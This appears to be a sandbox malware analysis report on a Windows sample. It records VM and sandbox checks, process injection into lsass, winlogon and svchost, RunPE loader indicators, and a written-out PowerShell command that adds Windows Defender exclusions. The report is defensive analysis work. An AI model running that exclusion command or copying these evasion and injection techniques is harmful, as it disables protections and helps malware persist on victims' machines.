          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Contains functionality to compare user and computer (likely to detect sandboxes)
          Source: C:\Windows\System32\dllhost.exeCode function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,45_2_0000000140001860
          Query firmware table information (likely to detect VMs)
          Source: C:\Windows\System32\dialer.exeSystem information queried: FirmwareTableInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5546Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4291Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5600Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2055Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8309Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1297Jump to behavior
          Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 4552
          Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 5447
          Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 9939
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3224
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2813
          Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 9873
          Source: C:\Windows\System32\dllhost.exeWindow / User API: threadDelayed 612
          Source: C:\ProgramData\Google\Chrome\updater.exeDropped PE file which has not been started: C:\Windows\Temp\xptjtnajcbas.sysJump to dropped file
          Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_45-623
          Source: C:\Windows\System32\dialer.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_26-197
          Source: C:\Windows\System32\dllhost.exeEvasive API call chain: RegQueryValue,DecisionNodes,ExitProcessgraph_45-628
          Source: C:\Windows\System32\dllhost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_45-585
          Source: C:\Windows\System32\conhost.exeAPI coverage: 5.0 %
          Source: C:\Windows\System32\lsass.exeAPI coverage: 6.8 %
          Source: C:\Windows\System32\dialer.exeAPI coverage: 0.8 %
          Source: C:\Windows\System32\conhost.exeAPI coverage: 5.0 %
          Source: C:\Windows\System32\svchost.exeAPI coverage: 5.1 %
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2184Thread sleep count: 5546 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2184Thread sleep count: 4291 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5632Thread sleep time: -7378697629483816s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 948Thread sleep count: 5600 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4876Thread sleep count: 2055 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5532Thread sleep time: -10145709240540247s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6672Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5132Thread sleep count: 8309 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5132Thread sleep count: 1297 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3816Thread sleep time: -3689348814741908s >= -30000sJump to behavior
          Source: C:\Windows\System32\dllhost.exe TID: 6816Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\winlogon.exe TID: 5860Thread sleep count: 4552 > 30
          Source: C:\Windows\System32\winlogon.exe TID: 5860Thread sleep time: -4552000s >= -30000s
          Source: C:\Windows\System32\winlogon.exe TID: 5860Thread sleep count: 5447 > 30
          Source: C:\Windows\System32\winlogon.exe TID: 5860Thread sleep time: -5447000s >= -30000s
          Source: C:\Windows\System32\lsass.exe TID: 6488Thread sleep count: 9939 > 30
          Source: C:\Windows\System32\lsass.exe TID: 6488Thread sleep time: -9939000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5132Thread sleep count: 3224 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2760Thread sleep count: 2813 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2724Thread sleep time: -8301034833169293s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2084Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 1016Thread sleep count: 241 > 30
          Source: C:\Windows\System32\svchost.exe TID: 1016Thread sleep time: -241000s >= -30000s
          Source: C:\Windows\System32\dwm.exe TID: 1428Thread sleep count: 9873 > 30
          Source: C:\Windows\System32\dwm.exe TID: 1428Thread sleep time: -9873000s >= -30000s
          Source: C:\Windows\System32\dllhost.exe TID: 2676Thread sleep count: 612 > 30
          Source: C:\Windows\System32\dllhost.exe TID: 2676Thread sleep time: -61200s >= -30000s
          Source: C:\Windows\System32\dllhost.exe TID: 5588Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 5696Thread sleep count: 250 > 30
          Source: C:\Windows\System32\svchost.exe TID: 5696Thread sleep time: -250000s >= -30000s
          Source: C:\Windows\System32\svchost.exe TID: 2136Thread sleep count: 252 > 30
          Source: C:\Windows\System32\svchost.exe TID: 2136Thread sleep time: -252000s >= -30000s
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\dialer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
          Source: C:\Windows\System32\lsass.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
          Source: C:\Windows\System32\dwm.exeLast function: Thread delayed
          Source: C:\Windows\System32\dllhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\dllhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeCode function: 32_2_000001D29E8CE110 FindFirstFileExW,32_2_000001D29E8CE110
          Source: C:\Windows\System32\winlogon.exeCode function: 50_2_000002D0165EE110 FindFirstFileExW,50_2_000002D0165EE110
          Source: C:\Windows\System32\lsass.exeCode function: 64_2_000002D6F151E110 FindFirstFileExW,64_2_000002D6F151E110
          Source: C:\Windows\System32\conhost.exeCode function: 68_2_00000146F6B0E110 FindFirstFileExW,68_2_00000146F6B0E110
          Source: C:\Windows\System32\svchost.exeCode function: 69_2_0000014E41FDE110 FindFirstFileExW,69_2_0000014E41FDE110
          Source: C:\Windows\System32\dwm.exeCode function: 70_2_000001D15B08E110 FindFirstFileExW,70_2_000001D15B08E110
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\dllhost.exeAPI call chain: ExitProcess graph end nodegraph_45-624
          Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end node
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\System32\conhost.exeCode function: 32_2_000001D29E8C81C0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_000001D29E8C81C0
          Source: C:\Windows\System32\dialer.exeCode function: 66_2_0000000140832D30 LoadLibraryA,GetProcAddressForCaller,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,66_2_0000000140832D30
          Source: C:\Windows\System32\dialer.exeCode function: 26_2_0000000140001C9C GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,StrStrIW,StrStrIW,StrNCatW,StrCatW,StrCatW,StrCatW,StrCatW,StrNCatW,StrCatW,StrCatW,StrCatW,StrStrIW,StrCatW,StrCpyW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,26_2_0000000140001C9C
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\conhost.exeCode function: 32_2_000001D29E8C81C0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_000001D29E8C81C0
          Source: C:\Windows\System32\conhost.exeCode function: 32_2_000001D29E8CD6D4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_000001D29E8CD6D4
          Source: C:\Windows\System32\conhost.exeCode function: 32_2_000001D29E8C8528 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,32_2_000001D29E8C8528
          Source: C:\Windows\System32\winlogon.exeCode function: 50_2_000002D0165ED6D4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,50_2_000002D0165ED6D4
          Source: C:\Windows\System32\winlogon.exeCode function: 50_2_000002D0165E8528 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,50_2_000002D0165E8528
          Source: C:\Windows\System32\winlogon.exeCode function: 50_2_000002D0165E81C0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,50_2_000002D0165E81C0
          Source: C:\Windows\System32\lsass.exeCode function: 64_2_000002D6F1518528 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,64_2_000002D6F1518528
          Source: C:\Windows\System32\lsass.exeCode function: 64_2_000002D6F15181C0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,64_2_000002D6F15181C0
          Source: C:\Windows\System32\lsass.exeCode function: 64_2_000002D6F151D6D4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,64_2_000002D6F151D6D4
          Source: C:\Windows\System32\dialer.exeCode function: 65_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,65_2_0000000140001160
          Source: C:\Windows\System32\conhost.exeCode function: 68_2_00000146F6B0D6D4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,68_2_00000146F6B0D6D4
          Source: C:\Windows\System32\conhost.exeCode function: 68_2_00000146F6B08528 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,68_2_00000146F6B08528
          Source: C:\Windows\System32\conhost.exeCode function: 68_2_00000146F6B081C0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,68_2_00000146F6B081C0
          Source: C:\Windows\System32\svchost.exeCode function: 69_2_0000014E41FD8528 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,69_2_0000014E41FD8528
          Source: C:\Windows\System32\svchost.exeCode function: 69_2_0000014E41FDD6D4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,69_2_0000014E41FDD6D4
          Source: C:\Windows\System32\svchost.exeCode function: 69_2_0000014E41FD81C0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,69_2_0000014E41FD81C0
          Source: C:\Windows\System32\dwm.exeCode function: 70_2_000001D15B08D6D4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,70_2_000001D15B08D6D4
          Source: C:\Windows\System32\dwm.exeCode function: 70_2_000001D15B0881C0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,70_2_000001D15B0881C0
          Source: C:\Windows\System32\dwm.exeCode function: 70_2_000001D15B088528 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,70_2_000001D15B088528

          HIPS / PFW / Operating System Protection Evasion

          barindex
          .NET source code contains process injector
          Source: 0.3.egFMhHSlmf.exe.224120834b0.1.raw.unpack, RunPE.cs.Net Code: Run contains injection code
          Source: 26.2.dialer.exe.1400050b0.1.raw.unpack, RunPE.cs.Net Code: Run contains injection code
          Source: 29.2.powershell.exe.217e6d49610.10.raw.unpack, RunPE.cs.Net Code: Run contains injection code
          Source: 29.2.powershell.exe.217ef310000.16.raw.unpack, RunPE.cs.Net Code: Run contains injection code
          Source: 37.3.updater.exe.17ade7634b0.0.raw.unpack, RunPE.cs.Net Code: Run contains injection code
          Source: 63.2.dialer.exe.1400050b0.1.raw.unpack, RunPE.cs.Net Code: Run contains injection code
          Source: 67.2.powershell.exe.28199a8ab70.15.raw.unpack, RunPE.cs.Net Code: Run contains injection code
          .NET source code references suspicious native API functions
          Source: 0.3.egFMhHSlmf.exe.224120834b0.1.raw.unpack, Unhook.csReference to suspicious API methods: VirtualProtect((IntPtr)((long)moduleHandle + num5), (IntPtr)num6, 64u, out var oldProtect)
          Source: 0.3.egFMhHSlmf.exe.224120834b0.1.raw.unpack, RunPE.csReference to suspicious API methods: OpenProcess(128, inheritHandle: false, parentProcessId)
          Source: 0.3.egFMhHSlmf.exe.224120834b0.1.raw.unpack, RunPE.csReference to suspicious API methods: NtAllocateVirtualMemory(process, ref address, IntPtr.Zero, ref size2, 12288u, 64u)
          Source: 0.3.egFMhHSlmf.exe.224120834b0.1.raw.unpack, RunPE.csReference to suspicious API methods: NtWriteVirtualMemory(process, address, payload, num3, IntPtr.Zero)
          Source: 0.3.egFMhHSlmf.exe.224120834b0.1.raw.unpack, RunPE.csReference to suspicious API methods: NtSetContextThread(thread, intPtr5)
          Adds a directory exclusion to Windows Defender
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Users\user\Desktop\egFMhHSlmf.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
          Contains functionality to inject code into remote processes
          Source: C:\Windows\System32\dllhost.exeCode function: 45_2_0000000140002434 CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,45_2_0000000140002434
          Creates a thread in another existing process (thread injection)
          Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\winlogon.exe EIP: 16582AC0
          Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\lsass.exe EIP: F14E2AC0
          Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 41FA2AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 16582AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F14E2AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 41FA2AC0
          Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5B052AC0
          Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: F32B2AC0
          Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\svchost.exe EIP: 9FD62AC0
